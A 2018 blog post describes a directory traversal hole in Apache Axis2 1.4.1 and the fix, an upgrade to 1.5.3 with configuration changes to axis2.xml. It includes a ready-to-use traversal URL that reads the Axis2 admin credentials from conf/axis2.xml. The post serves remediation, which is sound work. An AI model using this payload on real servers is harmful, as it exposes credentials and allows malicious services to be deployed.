Saturday, March 3, 2018

Axis 2 Directory traversal vulnerability


Axis 2 Directory traversal  security vulnerability


Recently I have encountered one security issue of Axis 2 (1.4.1) service. The attacker can navigate to the axis.xml using the link https://victim.com/axis2/services/Version?xsd=../conf/axis2.xml & can see the Axis 2 username & password. Then attacker can deploy any malicious service to hack the system.
The issue seems to happen if the Axis 2 version <1.5.3. Upgrading the existing version to 1.5.3 (at minimal, upper versions also support) solves the problem.

The root cause of the issue is below configuration in Axis 2 1.4.1 version:
<transportReceiver name="http"
                       class="org.apache.axis2.transport.http.SimpleHTTPServer">
        <parameter name="port">8080</parameter>

SimpleHTTPServer does not block any request & hence directory traversal is possible.

I have followed the below steps to upgrade the Axis 2 from 1.4.1 to 1.5.3
1.     Upgrade the Axis 2 version to 1.5.3. & update the jars

2.     Once the JARS have been upgraded, change the below ones in conf\axis2.xml

replace

<transportReceiver name="http"
                       class="org.apache.axis2.transport.http.SimpleHTTPServer">
        <parameter name="port">8080</parameter>

with below one

<transportReceiver name="http"
                       class="org.apache.axis2.transport.http.AxisServletListener">
        <parameter name="port">8080</parameter>
    </transportReceiver>

    <transportReceiver name="https"
                       class="org.apache.axis2.transport.http.AxisServletListener">
        <parameter name="port">8443</parameter>
    </transportReceiver>
3.     Comment TCPTransportSender in axis2.xml
<!--
    <transportSender name="tcp"
                     class="org.apache.axis2.transport.tcp.TCPTransportSender"/>-->

1 comment:

Unknown said...

Did you have to generate the WSDL2Java code after the upgrade to 1.5

How to do Sonar scan for Java Maven Project

 Below are the steps to run Sonar o Maven based Java Project 1. Install SonarQube server 2. Add below pluin dependency in application pom.xm...